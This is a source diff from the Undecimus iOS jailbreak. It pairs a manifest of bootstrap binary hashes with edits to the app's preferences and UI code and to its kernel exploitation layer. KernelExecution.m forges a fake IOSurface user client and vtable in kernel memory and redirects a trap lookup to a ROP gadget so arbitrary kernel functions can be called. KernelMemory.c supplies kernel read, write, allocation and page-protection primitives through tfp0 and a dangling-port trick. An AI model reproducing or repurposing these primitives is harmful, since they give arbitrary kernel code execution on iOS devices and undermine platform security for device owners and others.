+1fff1e9d64dd710f90c6008da71cd0a3  ./usr/share/terminfo/76/vt100-bm-o
+9093d267d0a3b5b7edc3008c6403d47b  ./usr/share/terminfo/76/vt100+keypad
+96300e9c1b0dea5f61383f5d22342ef3  ./usr/share/terminfo/76/vt100-am
+846029909338b3ee934e3cc1de3f3c0e  ./usr/share/terminfo/76/vt100-s-bot
+25cbb52e83f147f21489d20addde7cd1  ./usr/share/terminfo/76/vt100-w-am
+846bea1b765ff91b190735acc298a355  ./usr/share/terminfo/76/vt100-bm
+0ba872cd880784a95b7af42a83c48949  ./usr/share/terminfo/78/xterm-256color
+29fb028ed95c62344e4c7481dcd29073  ./bin/cat
+6fc19a7da30a530781ee4273f2a522e9  ./bin/launchctl
+466ef7ee8a34ba8440e3acb80fa71c87  ./bin/pwd
+b341e08776130c4bbeacb3c5440a3c8a  ./bin/sleep
+eef9a9be2cbabea493244700f9ae1a74  ./bin/stty
+49022225d7e96a902373075d65aec180  ./bin/date
+c88dae390cc7a36d809c47d1ebc3eb8b  ./bin/bash
+07c13bc01719fade1c0de1a58e724054  ./bin/kill
+370429cf74f838ef835d2f6c0d3fa372  ./bin/sh
+917a48c4bfbf425642bc6bb211b471c8  ./bin/dd
+77478fa33e34293ec64b06520e4c177b  ./bin/mkdir
+1db90ee85858bfe24c3e48ee79fc6a8f  ./bin/hostname
+1af430cf9a416718a833dc7d56b83d3f  ./bin/rmdir
+d7b48f7b1b6079c15ca03433aa491b80  ./bin/mv
+36d7da72f9f403da7f93d05a730e34dc  ./bin/ln
+ab5a603e1b9767b4bdbc7bbe0d1c73ab  ./bin/ls
+073a21568d2972f660a50a6285382e22  ./bin/cp
+960e843cbea307bbfbfbe03cf0ba6dc7  ./bin/sync
+1bcc4fc32919686b78d57ddc7c52bd9b  ./bin/zsh
+cef478d4cc0ecf6e79cd66ef6637c326  ./bin/chmod
+4f5505d33d87c4a7ff02193201259efe  ./bin/rm
+be57e6ecb88b09d17bade80754ac9090  ./sbin/md5
+d55d1d2b3bb292f0a0bb336fe9207b8e  ./sbin/ping
+80d22f83f5a5910c514548dab882ab88  ./sbin/shutdown
+fd71b7e59272201dd1224423907f6d19  ./sbin/ifconfig
+7654ea8f99b18c262cd3eb77147640dd  ./sbin/umount
+50a03c50fd14f9ec62f5354ff65b2a8c  ./sbin/kextunload
+139ce2d3be19697053781879d36e932e  ./sbin/mknod
+4945de2c730d66ee21d0ab14990c026f  ./sbin/dmesg
+1a2802c58d678f6e8f8f8b2027c97c63  ./etc/zshrc
+fe116dfdd0905b1d881cdb27799332d3  ./etc/profile
+d41d8cd98f00b204e9800998ecf8427e  ./etc/apt/sources.list.d/cydia.list
+ac0e7ddf2acd61e6c54b37f9fafc1253  ./etc/apt/sources.list.d/saurik.list
+7c47a6c3258b47b256f601d65c6dae3d  ./etc/apt/trusted.gpg.d/zodttd.gpg
+4f56a1d2f4b62780e13bc494dd0eb8e6  ./etc/apt/trusted.gpg.d/bigboss.gpg
+ba6d927670a3d16eea0930c13ce60720  ./etc/apt/trusted.gpg.d/modmyi.gpg
+f2df1c620b1de53b3328f7d16be06317  ./etc/apt/trusted.gpg.d/saurik.gpg
+69c4ba7f08363e998e0f2e244a04f881  ./etc/alternatives/README
+9f17f5160584913c1ac2395923f233df  ./default.ent

Undecimus/resources/ents.xml

@@ -1,15 +0,0 @@
-<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
-<plist version="1.0">
-<dict>
-	<key>com.apple.private.skip-library-validation</key>
-	<true/>
-	<key>com.apple.springboard.debugapplications</key>
-	<true/>
-	<key>dynamic-codesigning</key>
-	<true/>
-	<key>platform-application</key>
-	<true/>
-	<key>task_for_pid-allow</key>
-	<true/>
-</dict>
-</plist>

Undecimus/source/AppDelegate.m

@@ -11,6 +11,7 @@
 #include "JailbreakViewController.h"
 #include "SettingsTableViewController.h"
 #include "utils.h"
+#include "prefs.h"
 
 @interface AppDelegate ()
 
@@ -77,88 +78,14 @@
     // Override point for customization after application launch.
     [self initPrefs];
     [self initShortcuts];
+    UIApplication.sharedApplication.idleTimerDisabled = TRUE;
     return YES;
 }
 
 
 - (void)initPrefs {
-    if ([[NSUserDefaults standardUserDefaults] objectForKey:K_TWEAK_INJECTION] == nil) {
-        [[NSUserDefaults standardUserDefaults] setBool:YES forKey:K_TWEAK_INJECTION];
-        [[NSUserDefaults standardUserDefaults] synchronize];
-    }
-    if ([[NSUserDefaults standardUserDefaults] objectForKey:K_LOAD_DAEMONS] == nil) {
-        [[NSUserDefaults standardUserDefaults] setBool:YES forKey:K_LOAD_DAEMONS];
-        [[NSUserDefaults standardUserDefaults] synchronize];
-    }
-    if ([[NSUserDefaults standardUserDefaults] objectForKey:K_DUMP_APTICKET] == nil) {
-        [[NSUserDefaults standardUserDefaults] setBool:YES forKey:K_DUMP_APTICKET];
-        [[NSUserDefaults standardUserDefaults] synchronize];
-    }
-    if ([[NSUserDefaults standardUserDefaults] objectForKey:K_REFRESH_ICON_CACHE] == nil) {
-        [[NSUserDefaults standardUserDefaults] setBool:NO forKey:K_REFRESH_ICON_CACHE];
-        [[NSUserDefaults standardUserDefaults] synchronize];
-    }
-    if ([[NSUserDefaults standardUserDefaults] objectForKey:K_BOOT_NONCE] == nil) {
-        [[NSUserDefaults standardUserDefaults] setObject:@"0x1111111111111111" forKey:K_BOOT_NONCE];
-        [[NSUserDefaults standardUserDefaults] synchronize];
-    }
-    if ([[NSUserDefaults standardUserDefaults] objectForKey:K_EXPLOIT] != nil &&
-        !supportsExploit((exploit_t)[[NSUserDefaults standardUserDefaults] integerForKey:K_EXPLOIT])) {
-        [[NSUserDefaults standardUserDefaults] removeObjectForKey:K_EXPLOIT];
-        [[NSUserDefaults standardUserDefaults] synchronize];
-    }
-    if ([[NSUserDefaults standardUserDefaults] objectForKey:K_EXPLOIT] == nil) {
-        [[NSUserDefaults standardUserDefaults] setInteger:recommendedJailbreakSupport() forKey:K_EXPLOIT];
-        [[NSUserDefaults standardUserDefaults] synchronize];
-    }
-    if ([[NSUserDefaults standardUserDefaults] objectForKey:K_DISABLE_AUTO_UPDATES] == nil) {
-        [[NSUserDefaults standardUserDefaults] setBool:YES forKey:K_DISABLE_AUTO_UPDATES];
-        [[NSUserDefaults standardUserDefaults] synchronize];
-    }
-    if ([[NSUserDefaults standardUserDefaults] objectForKey:K_DISABLE_APP_REVOKES] == nil) {
-        [[NSUserDefaults standardUserDefaults] setBool:YES forKey:K_DISABLE_APP_REVOKES];
-        [[NSUserDefaults standardUserDefaults] synchronize];
-    }
-    if ([[NSUserDefaults standardUserDefaults] objectForKey:K_OVERWRITE_BOOT_NONCE] == nil) {
-        [[NSUserDefaults standardUserDefaults] setBool:YES forKey:K_OVERWRITE_BOOT_NONCE];
-        [[NSUserDefaults standardUserDefaults] synchronize];
-    }
-    if ([[NSUserDefaults standardUserDefaults] objectForKey:K_EXPORT_KERNEL_TASK_PORT] == nil) {
-        [[NSUserDefaults standardUserDefaults] setBool:NO forKey:K_EXPORT_KERNEL_TASK_PORT];
-        [[NSUserDefaults standardUserDefaults] synchronize];
-    }
-    if ([[NSUserDefaults standardUserDefaults] objectForKey:K_RESTORE_ROOTFS] == nil) {
-        [[NSUserDefaults standardUserDefaults] setBool:NO forKey:K_RESTORE_ROOTFS];
-        [[NSUserDefaults standardUserDefaults] synchronize];
-    }
-    if ([[NSUserDefaults standardUserDefaults] objectForKey:K_INCREASE_MEMORY_LIMIT] == nil) {
-        [[NSUserDefaults standardUserDefaults] setBool:NO forKey:K_INCREASE_MEMORY_LIMIT];
-        [[NSUserDefaults standardUserDefaults] synchronize];
-    }
-    if ([[NSUserDefaults standardUserDefaults] objectForKey:K_ECID] == nil) {
-        [[NSUserDefaults standardUserDefaults] setObject:@"0x0" forKey:K_ECID];
-        [[NSUserDefaults standardUserDefaults] synchronize];
-    }
-    if ([[NSUserDefaults standardUserDefaults] objectForKey:K_INSTALL_CYDIA] == nil) {
-        [[NSUserDefaults standardUserDefaults] setBool:NO forKey:K_INSTALL_CYDIA];
-        [[NSUserDefaults standardUserDefaults] synchronize];
-    }
-    if ([[NSUserDefaults standardUserDefaults] objectForKey:K_INSTALL_OPENSSH] == nil) {
-        [[NSUserDefaults standardUserDefaults] setBool:NO forKey:K_INSTALL_OPENSSH];
-        [[NSUserDefaults standardUserDefaults] synchronize];
-    }
-    if ([[NSUserDefaults standardUserDefaults] objectForKey:K_RELOAD_SYSTEM_DAEMONS] == nil) {
-        [[NSUserDefaults standardUserDefaults] setBool:YES forKey:K_RELOAD_SYSTEM_DAEMONS];
-        [[NSUserDefaults standardUserDefaults] synchronize];
-    }
-    if ([[NSUserDefaults standardUserDefaults] objectForKey:K_HIDE_LOG_WINDOW] == nil) {
-        [[NSUserDefaults standardUserDefaults] setBool:NO forKey:K_HIDE_LOG_WINDOW];
-        [[NSUserDefaults standardUserDefaults] synchronize];
-    }
-    if ([[NSUserDefaults standardUserDefaults] objectForKey:K_RESET_CYDIA_CACHE] == nil) {
-        [[NSUserDefaults standardUserDefaults] setBool:NO forKey:K_RESET_CYDIA_CACHE];
-        [[NSUserDefaults standardUserDefaults] synchronize];
-    }
+    register_default_prefs();
+    repair_prefs();
 }
 
 - (void)initShortcuts {

Undecimus/source/FakeApt.m

@@ -403,10 +403,7 @@ NSDictionary *getPkgs(void) {
                 }
             }
         }
-        if (line) {
-            free(line);
-            line = NULL;
-        }
+        SafeFreeNULL(line);
         fclose(pkgs_file);
         
         mpkgs[@"firmware"] = @{

Undecimus/source/JailbreakViewController.h

@@ -7,13 +7,11 @@
 //
 
 #import <UIKit/UIKit.h>
+#import <UIProgressHUD.h>
 #import "common.h"
 
 #define __FILENAME__ (__builtin_strrchr(__FILE__, '/') ? __builtin_strrchr(__FILE__, '/') + 1 : __FILE__)
 
-static NSString *message = nil;
-#define SETMESSAGE(msg) (message = msg)
-
 #define _assert(test, message, fatal) do \
     if (!(test)) { \
         int saved_errno = errno; \
@@ -28,11 +26,24 @@ static NSString *message = nil;
             } else { \
                 return; \
             } \
+        errno = saved_errno; \
         } \
     } \
 while (false)
 
-#define NOTICE(msg, wait, destructive) showAlert(@"Notice", msg, wait, destructive)
+#define notice(msg, wait, destructive) showAlert(@"Notice", msg, wait, destructive)
+
+#define status(msg, btnenbld, tbenbld) do { \
+    LOG("Status: %@", msg); \
+    dispatch_async(dispatch_get_main_queue(), ^{ \
+        [UIView performWithoutAnimation:^{ \
+            [[[JailbreakViewController sharedController] goButton] setEnabled:btnenbld]; \
+            [[[[JailbreakViewController sharedController] tabBarController] tabBar] setUserInteractionEnabled:tbenbld]; \
+            [[[JailbreakViewController sharedController] goButton] setTitle:msg forState: btnenbld ? UIControlStateNormal : UIControlStateDisabled]; \
+            [[[JailbreakViewController sharedController] goButton] layoutIfNeeded]; \
+        }]; \
+    }); \
+} while (false)
 
 @interface JailbreakViewController : UIViewController
 @property (weak, nonatomic) IBOutlet UIButton *goButton;
@@ -51,6 +62,39 @@ NSString *hexFromInt(NSInteger val);
 
 @end
 
+static inline UIProgressHUD *addProgressHUD() {
+    __block UIProgressHUD *hud = nil;
+    dispatch_semaphore_t semaphore = dispatch_semaphore_create(0);
+    dispatch_async(dispatch_get_main_queue(), ^{
+        hud = [[UIProgressHUD alloc] init];
+        [hud setAutoresizingMask:UIViewAutoresizingFlexibleWidth | UIViewAutoresizingFlexibleHeight];
+        UIView *view = [[JailbreakViewController sharedController] view];
+        [hud showInView:view];
+        dispatch_semaphore_signal(semaphore);
+    });
+    dispatch_semaphore_wait(semaphore, DISPATCH_TIME_FOREVER);
+    return hud;
+}
+
+static inline void removeProgressHUD(UIProgressHUD *hud) {
+    dispatch_semaphore_t semaphore = dispatch_semaphore_create(0);
+    dispatch_async(dispatch_get_main_queue(), ^{
+        [hud hide];
+        [hud done];
+        dispatch_semaphore_signal(semaphore);
+    });
+    dispatch_semaphore_wait(semaphore, DISPATCH_TIME_FOREVER);
+}
+
+static inline void updateProgressHUD(UIProgressHUD *hud, NSString *msg) {
+    dispatch_semaphore_t semaphore = dispatch_semaphore_create(0);
+    dispatch_async(dispatch_get_main_queue(), ^{
+        [hud setText:msg];
+        dispatch_semaphore_signal(semaphore);
+    });
+    dispatch_semaphore_wait(semaphore, DISPATCH_TIME_FOREVER);
+}
+
 static inline void showAlertWithCancel(NSString *title, NSString *message, Boolean wait, Boolean destructive, NSString *cancel) {
     dispatch_semaphore_t semaphore;
     if (wait)
@@ -83,9 +127,15 @@ static inline void showAlertWithCancel(NSString *title, NSString *message, Boole
 }
 
 static inline void showAlert(NSString *title, NSString *message, Boolean wait, Boolean destructive) {
-    static bool outputIsHidden;
-    dispatch_sync(dispatch_get_main_queue(), ^{
+    __block bool outputIsHidden;
+    dispatch_block_t checkOutput = ^{
         outputIsHidden = [[[JailbreakViewController sharedController] outputView] isHidden];
-    });
+    };
+
+    if ([[NSThread currentThread] isMainThread]) {
+        checkOutput();
+    } else {
+        dispatch_sync(dispatch_get_main_queue(), checkOutput);
+    }
     showAlertWithCancel(title, message, wait, destructive, outputIsHidden?nil:@"View Log");
 }

Undecimus/source/KernelExecution.h

@@ -1,7 +1,6 @@
-#include <inttypes.h>
+#include <common.h>
 #include <mach/mach.h>
 
-mach_port_t prepare_user_client(void);
-void init_kexecute(void);
-void term_kexecute(void);
-uint64_t kexecute(uint64_t addr, uint64_t x0, uint64_t x1, uint64_t x2, uint64_t x3, uint64_t x4, uint64_t x5, uint64_t x6);
+bool init_kexec(void);
+void term_kexec(void);
+kptr_t kexec(kptr_t ptr, kptr_t x0, kptr_t x1, kptr_t x2, kptr_t x3, kptr_t x4, kptr_t x5, kptr_t x6);

Undecimus/source/KernelExecution.m

@@ -1,13 +1,19 @@
 #include "KernelExecution.h"
 #include "KernelMemory.h"
-#include "KernelStructureOffsets.h"
+#include "KernelOffsets.h"
 #include "KernelUtilities.h"
 #include "find_port.h"
+#include "kernel_call.h"
 #include <common.h>
 #include <iokit.h>
 #include <pthread.h>
+#import <patchfinder64.h>
+#include "parameters.h"
+#include "kc_parameters.h"
+#include "kernel_memory.h"
 
-mach_port_t prepare_user_client()
+#if !__arm64e__
+static mach_port_t prepare_user_client()
 {
     kern_return_t err;
     mach_port_t user_client;
@@ -24,34 +30,49 @@ mach_port_t prepare_user_client()
         exit(EXIT_FAILURE);
     }
 
-    LOG("got user client: 0x%x", user_client);
     return user_client;
 }
 
-pthread_mutex_t kexecute_lock;
 static mach_port_t user_client;
-static uint64_t IOSurfaceRootUserClient_port;
-static uint64_t IOSurfaceRootUserClient_addr;
-static uint64_t fake_vtable;
-static uint64_t fake_client;
-const int fake_kalloc_size = 0x1000;
+static kptr_t IOSurfaceRootUserClient_port;
+static kptr_t IOSurfaceRootUserClient_addr;
+static kptr_t fake_vtable;
+static kptr_t fake_client;
+static const int fake_kalloc_size = 0x1000;
+#endif
+static pthread_mutex_t kexec_lock;
 
-void init_kexecute()
+bool init_kexec()
 {
+#if __arm64e__
+    if (!parameters_init()) return false;
+    kernel_task_port = tfp0;
+    if (!MACH_PORT_VALID(kernel_task_port)) return false;
+    current_task = ReadKernel64(task_self_addr() + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT));
+    if (!KERN_POINTER_VALID(current_task)) return false;
+    kernel_task = ReadKernel64(getoffset(kernel_task));
+    if (!KERN_POINTER_VALID(kernel_task)) return false;
+    if (!kernel_call_init()) return false;
+#else
     user_client = prepare_user_client();
+    if (!MACH_PORT_VALID(user_client)) return false;
 
     // From v0rtex - get the IOSurfaceRootUserClient port, and then the address of the actual client, and vtable
     IOSurfaceRootUserClient_port = get_address_of_port(getpid(), user_client); // UserClients are just mach_ports, so we find its address
+    if (!KERN_POINTER_VALID(IOSurfaceRootUserClient_port)) return false;
 
     IOSurfaceRootUserClient_addr = ReadKernel64(IOSurfaceRootUserClient_port + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT)); // The UserClient itself (the C++ object) is at the kobject field
+    if (!KERN_POINTER_VALID(IOSurfaceRootUserClient_addr)) return false;
 
-    uint64_t IOSurfaceRootUserClient_vtab = ReadKernel64(IOSurfaceRootUserClient_addr); // vtables in C++ are at *object
+    kptr_t IOSurfaceRootUserClient_vtab = ReadKernel64(IOSurfaceRootUserClient_addr); // vtables in C++ are at *object
+    if (!KERN_POINTER_VALID(IOSurfaceRootUserClient_vtab)) return false;
 
     // The aim is to create a fake client, with a fake vtable, and overwrite the existing client with the fake one
     // Once we do that, we can use IOConnectTrap6 to call functions in the kernel as the kernel
 
     // Create the vtable in the kernel memory, then copy the existing vtable into there
     fake_vtable = kmem_alloc(fake_kalloc_size);
+    if (!KERN_POINTER_VALID(fake_vtable)) return false;
 
     for (int i = 0; i < 0x200; i++) {
         WriteKernel64(fake_vtable + i * 8, ReadKernel64(IOSurfaceRootUserClient_vtab + i * 8));
@@ -59,6 +80,7 @@ void init_kexecute()
 
     // Create the fake user client
     fake_client = kmem_alloc(fake_kalloc_size);
+    if (!KERN_POINTER_VALID(fake_client)) return false;
 
     for (int i = 0; i < 0x200; i++) {
         WriteKernel64(fake_client + i * 8, ReadKernel64(IOSurfaceRootUserClient_addr + i * 8));
@@ -73,22 +95,33 @@ void init_kexecute()
     // Now the userclient port we have will look into our fake user client rather than the old one
 
     // Replace IOUserClient::getExternalTrapForIndex with our ROP gadget (add x0, x0, #0x40; ret;)
-    WriteKernel64(fake_vtable + 8 * 0xB7, GETOFFSET(add_x0_x0_0x40_ret));
+    WriteKernel64(fake_vtable + 8 * 0xB7, getoffset(add_x0_x0_0x40_ret));
 
-    pthread_mutex_init(&kexecute_lock, NULL);
+#endif
+    pthread_mutex_init(&kexec_lock, NULL);
+    return true;
 }
 
-void term_kexecute()
+void term_kexec()
 {
+#if __arm64e__
+    kernel_call_deinit();
+#else
     WriteKernel64(IOSurfaceRootUserClient_port + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT), IOSurfaceRootUserClient_addr);
     kmem_free(fake_vtable, fake_kalloc_size);
     kmem_free(fake_client, fake_kalloc_size);
+    IOServiceClose(user_client);
+#endif
+    pthread_mutex_destroy(&kexec_lock);
 }
 
-uint64_t kexecute(uint64_t addr, uint64_t x0, uint64_t x1, uint64_t x2, uint64_t x3, uint64_t x4, uint64_t x5, uint64_t x6)
+kptr_t kexec(kptr_t ptr, kptr_t x0, kptr_t x1, kptr_t x2, kptr_t x3, kptr_t x4, kptr_t x5, kptr_t x6)
 {
-    pthread_mutex_lock(&kexecute_lock);
-
+    kptr_t returnval = 0;
+    pthread_mutex_lock(&kexec_lock);
+#if __arm64e__
+    returnval = kernel_call_7(ptr, 7, x0, x1, x2, x3, x4, x5, x6);
+#else
     // When calling IOConnectTrapX, this makes a call to iokit_user_client_trap, which is the user->kernel call (MIG). This then calls IOUserClient::getTargetAndTrapForIndex
     // to get the trap struct (which contains an object and the function pointer itself). This function calls IOUserClient::getExternalTrapForIndex, which is expected to return a trap.
     // This jumps to our gadget, which returns +0x40 into our fake user_client, which we can modify. The function is then called on the object. But how C++ actually works is that the
@@ -99,15 +132,14 @@ uint64_t kexecute(uint64_t addr, uint64_t x0, uint64_t x1, uint64_t x2, uint64_t
     // We will pull a switch when doing so - retrieve the current contents, call the trap, put back the contents
     // (i'm not actually sure if the switch back is necessary but meh)
 
-    uint64_t offx20 = ReadKernel64(fake_client + 0x40);
-    uint64_t offx28 = ReadKernel64(fake_client + 0x48);
+    kptr_t offx20 = ReadKernel64(fake_client + 0x40);
+    kptr_t offx28 = ReadKernel64(fake_client + 0x48);
     WriteKernel64(fake_client + 0x40, x0);
-    WriteKernel64(fake_client + 0x48, addr);
-    uint64_t returnval = IOConnectTrap6(user_client, 0, x1, x2, x3, x4, x5, x6);
+    WriteKernel64(fake_client + 0x48, ptr);
+    returnval = IOConnectTrap6(user_client, 0, x1, x2, x3, x4, x5, x6);
     WriteKernel64(fake_client + 0x40, offx20);
     WriteKernel64(fake_client + 0x48, offx28);
-
-    pthread_mutex_unlock(&kexecute_lock);
-
+#endif
+    pthread_mutex_unlock(&kexec_lock);
     return returnval;
 }

Undecimus/source/KernelMemory.c

@@ -7,6 +7,9 @@
 #include "KernelUtilities.h"
 #include <common.h>
 
+size_t kreads = 0;
+size_t kwrites = 0;
+
 // the exploit bootstraps the full kernel memory read/write with a fake
 // task which just allows reading via the bsd_info->pid trick
 // this first port is kmem_read_port
@@ -29,15 +32,15 @@ void prepare_for_rw_with_fake_tfp0(mach_port_t fake_tfp0)
 
 bool have_kmem_read()
 {
-    return (kmem_read_port != MACH_PORT_NULL) || (tfp0 != MACH_PORT_NULL);
+    return MACH_PORT_VALID(kmem_read_port) || MACH_PORT_VALID(tfp0);
 }
 
 bool have_kmem_write()
 {
-    return (tfp0 != MACH_PORT_NULL);
+    return MACH_PORT_VALID(tfp0);
 }
 
-size_t kread(uint64_t where, void* p, size_t size)
+size_t kread(kptr_t where, void* p, size_t size)
 {
     int rv;
     size_t offset = 0;
@@ -57,10 +60,11 @@ size_t kread(uint64_t where, void* p, size_t size)
         }
         offset += sz;
     }
+    kreads += offset;
     return offset;
 }
 
-size_t kwrite(uint64_t where, const void* p, size_t size)
+size_t kwrite(kptr_t where, const void* p, size_t size)
 {
     int rv;
     size_t offset = 0;
@@ -79,51 +83,45 @@ size_t kwrite(uint64_t where, const void* p, size_t size)
         }
         offset += chunk;
     }
+    kwrites += offset;
     return offset;
 }
 
-bool wkbuffer(uint64_t kaddr, void* buffer, size_t length)
+bool wkbuffer(kptr_t kaddr, void* buffer, size_t length)
 {
-    if (tfp0 == MACH_PORT_NULL) {
+    if (!MACH_PORT_VALID(tfp0)) {
         LOG("attempt to write to kernel memory before any kernel memory write primitives available");
-        sleep(3);
         return false;
     }
-
+    
     return (kwrite(kaddr, buffer, length) == length);
 }
 
-bool rkbuffer(uint64_t kaddr, void* buffer, size_t length)
+bool rkbuffer(kptr_t kaddr, void* buffer, size_t length)
 {
+    if (!MACH_PORT_VALID(tfp0)) {
+        LOG("attempt to read kernel memory but no kernel memory read primitives available");
+        return 0;
+    }
+    
     return (kread(kaddr, buffer, length) == length);
 }
 
-void WriteKernel32(uint64_t kaddr, uint32_t val)
+bool WriteKernel32(kptr_t kaddr, uint32_t val)
 {
-    if (tfp0 == MACH_PORT_NULL) {
-        LOG("attempt to write to kernel memory before any kernel memory write primitives available");
-        sleep(3);
-        return;
-    }
-    wkbuffer(kaddr, &val, sizeof(val));
+    return wkbuffer(kaddr, &val, sizeof(val));
 }
 
-void WriteKernel64(uint64_t kaddr, uint64_t val)
+bool WriteKernel64(kptr_t kaddr, uint64_t val)
 {
-    if (tfp0 == MACH_PORT_NULL) {
-        LOG("attempt to write to kernel memory before any kernel memory write primitives available");
-        sleep(3);
-        return;
-    }
-    wkbuffer(kaddr, &val, sizeof(val));
+    return wkbuffer(kaddr, &val, sizeof(val));
 }
 
-uint32_t rk32_via_kmem_read_port(uint64_t kaddr)
+uint32_t rk32_via_kmem_read_port(kptr_t kaddr)
 {
     kern_return_t err;
     if (kmem_read_port == MACH_PORT_NULL) {
         LOG("kmem_read_port not set, have you called prepare_rk?");
-        sleep(10);
         exit(EXIT_FAILURE);
     }
 
@@ -131,7 +129,6 @@ uint32_t rk32_via_kmem_read_port(uint64_t kaddr)
     err = mach_port_set_context(mach_task_self(), kmem_read_port, context);
     if (err != KERN_SUCCESS) {
         LOG("error setting context off of dangling port: %x %s", err, mach_error_string(err));
-        sleep(10);
         exit(EXIT_FAILURE);
     }
 
@@ -140,21 +137,20 @@ uint32_t rk32_via_kmem_read_port(uint64_t kaddr)
     err = pid_for_task(kmem_read_port, (int*)&val);
     if (err != KERN_SUCCESS) {
         LOG("error calling pid_for_task %x %s", err, mach_error_string(err));
-        sleep(10);
         exit(EXIT_FAILURE);
     }
 
     return val;
 }
 
-uint32_t rk32_via_tfp0(uint64_t kaddr)
+uint32_t rk32_via_tfp0(kptr_t kaddr)
 {
     uint32_t val = 0;
     rkbuffer(kaddr, &val, sizeof(val));
     return val;
 }
 
-uint64_t rk64_via_kmem_read_port(uint64_t kaddr)
+uint64_t rk64_via_kmem_read_port(kptr_t kaddr)
 {
     uint64_t lower = rk32_via_kmem_read_port(kaddr);
     uint64_t higher = rk32_via_kmem_read_port(kaddr + 4);
@@ -162,50 +158,41 @@ uint64_t rk64_via_kmem_read_port(uint64_t kaddr)
     return full;
 }
 
-uint64_t rk64_via_tfp0(uint64_t kaddr)
+uint64_t rk64_via_tfp0(kptr_t kaddr)
 {
     uint64_t val = 0;
     rkbuffer(kaddr, &val, sizeof(val));
     return val;
 }
 
-uint32_t ReadKernel32(uint64_t kaddr)
+uint32_t ReadKernel32(kptr_t kaddr)
 {
-    if (tfp0 != MACH_PORT_NULL) {
+    if (MACH_PORT_VALID(tfp0)) {
         return rk32_via_tfp0(kaddr);
-    }
-
-    if (kmem_read_port != MACH_PORT_NULL) {
+    } else if (MACH_PORT_VALID(kmem_read_port)) {
         return rk32_via_kmem_read_port(kaddr);
+    } else {
+        LOG("attempt to read kernel memory but no kernel memory read primitives available");
+        return 0;
     }
-
-    LOG("attempt to read kernel memory but no kernel memory read primitives available");
-    sleep(3);
-
-    return 0;
 }
 
-uint64_t ReadKernel64(uint64_t kaddr)
+uint64_t ReadKernel64(kptr_t kaddr)
 {
-    if (tfp0 != MACH_PORT_NULL) {
+    if (MACH_PORT_VALID(tfp0)) {
         return rk64_via_tfp0(kaddr);
-    }
-
-    if (kmem_read_port != MACH_PORT_NULL) {
+    } else if (MACH_PORT_VALID(kmem_read_port)) {
         return rk64_via_kmem_read_port(kaddr);
+    } else {
+        LOG("attempt to read kernel memory but no kernel memory read primitives available");
+        return 0;
     }
-
-    LOG("attempt to read kernel memory but no kernel memory read primitives available");
-    sleep(3);
-
-    return 0;
 }
 
-const uint64_t kernel_address_space_base = 0xffff000000000000;
 void kmemcpy(uint64_t dest, uint64_t src, uint32_t length)
 {
-    if (dest >= kernel_address_space_base) {
-        // copy to kernel:
+    if (KERN_POINTER_VALID(dest)) {
+        // copy to kernel
         wkbuffer(dest, (void*)src, length);
     } else {
         // copy from kernel
@@ -213,11 +200,10 @@ void kmemcpy(uint64_t dest, uint64_t src, uint32_t length)
     }
 }
 
-uint64_t kmem_alloc(uint64_t size)
+kptr_t kmem_alloc(uint64_t size)
 {
-    if (tfp0 == MACH_PORT_NULL) {
+    if (!MACH_PORT_VALID(tfp0)) {
         LOG("attempt to allocate kernel memory before any kernel memory write primitives available");
-        sleep(3);
         return 0;
     }
 
@@ -227,17 +213,16 @@ uint64_t kmem_alloc(uint64_t size)
     err = mach_vm_allocate(tfp0, &addr, ksize, VM_FLAGS_ANYWHERE);
     if (err != KERN_SUCCESS) {
         LOG("unable to allocate kernel memory via tfp0: %s %x", mach_error_string(err), err);
-        sleep(3);
         return 0;
     }
+    
     return addr;
 }
 
-uint64_t kmem_alloc_wired(uint64_t size)
+kptr_t kmem_alloc_wired(uint64_t size)
 {
-    if (tfp0 == MACH_PORT_NULL) {
+    if (!MACH_PORT_VALID(tfp0)) {
         LOG("attempt to allocate kernel memory before any kernel memory write primitives available");
-        sleep(3);
         return 0;
     }
 
@@ -245,61 +230,58 @@ uint64_t kmem_alloc_wired(uint64_t size)
     mach_vm_address_t addr = 0;
     mach_vm_size_t ksize = round_page_kernel(size);
 
-    LOG("vm_kernel_page_size: %lx", vm_kernel_page_size);
-
     err = mach_vm_allocate(tfp0, &addr, ksize + 0x4000, VM_FLAGS_ANYWHERE);
     if (err != KERN_SUCCESS) {
         LOG("unable to allocate kernel memory via tfp0: %s %x", mach_error_string(err), err);
-        sleep(3);
         return 0;
     }
 
-    LOG("allocated address: %llx", addr);
-
     addr += 0x3fff;
     addr &= ~0x3fffull;
 
-    LOG("address to wire: %llx", addr);
-
-    err = mach_vm_wire(fake_host_priv(), tfp0, addr, ksize, VM_PROT_READ | VM_PROT_WRITE);
+    host_t host = mach_host_self();
+    err = mach_vm_wire(host, tfp0, addr, ksize, VM_PROT_READ | VM_PROT_WRITE);
+    mach_port_deallocate(mach_task_self(), host);
+    host = HOST_NULL;
     if (err != KERN_SUCCESS) {
         LOG("unable to wire kernel memory via tfp0: %s %x", mach_error_string(err), err);
-        sleep(3);
         return 0;
     }
+    
     return addr;
 }
 
-void kmem_free(uint64_t kaddr, uint64_t size)
+bool kmem_free(kptr_t kaddr, uint64_t size)
 {
-    if (tfp0 == MACH_PORT_NULL) {
+    if (!MACH_PORT_VALID(tfp0)) {
         LOG("attempt to deallocate kernel memory before any kernel memory write primitives available");
-        sleep(3);
-        return;
+        return false;
     }
-
+    
     kern_return_t err;
     mach_vm_size_t ksize = round_page_kernel(size);
     err = mach_vm_deallocate(tfp0, kaddr, ksize);
     if (err != KERN_SUCCESS) {
         LOG("unable to deallocate kernel memory via tfp0: %s %x", mach_error_string(err), err);
-        sleep(3);
-        return;
+        return false;
     }
+    
+    return true;
 }
 
-void kmem_protect(uint64_t kaddr, uint32_t size, int prot)
+bool kmem_protect(kptr_t kaddr, uint32_t size, vm_prot_t prot)
 {
-    if (tfp0 == MACH_PORT_NULL) {
+    if (!MACH_PORT_VALID(tfp0)) {
         LOG("attempt to change protection of kernel memory before any kernel memory write primitives available");
-        sleep(3);
-        return;
+        return false;
     }
+    
     kern_return_t err;
     err = mach_vm_protect(tfp0, (mach_vm_address_t)kaddr, (mach_vm_size_t)size, 0, (vm_prot_t)prot);
     if (err != KERN_SUCCESS) {
         LOG("unable to change protection of kernel memory via tfp0: %s %x", mach_error_string(err), err);
-        sleep(3);
-        return;
+        return false;
     }
+    
+    return true;
 }

Undecimus/source/KernelMemory.h

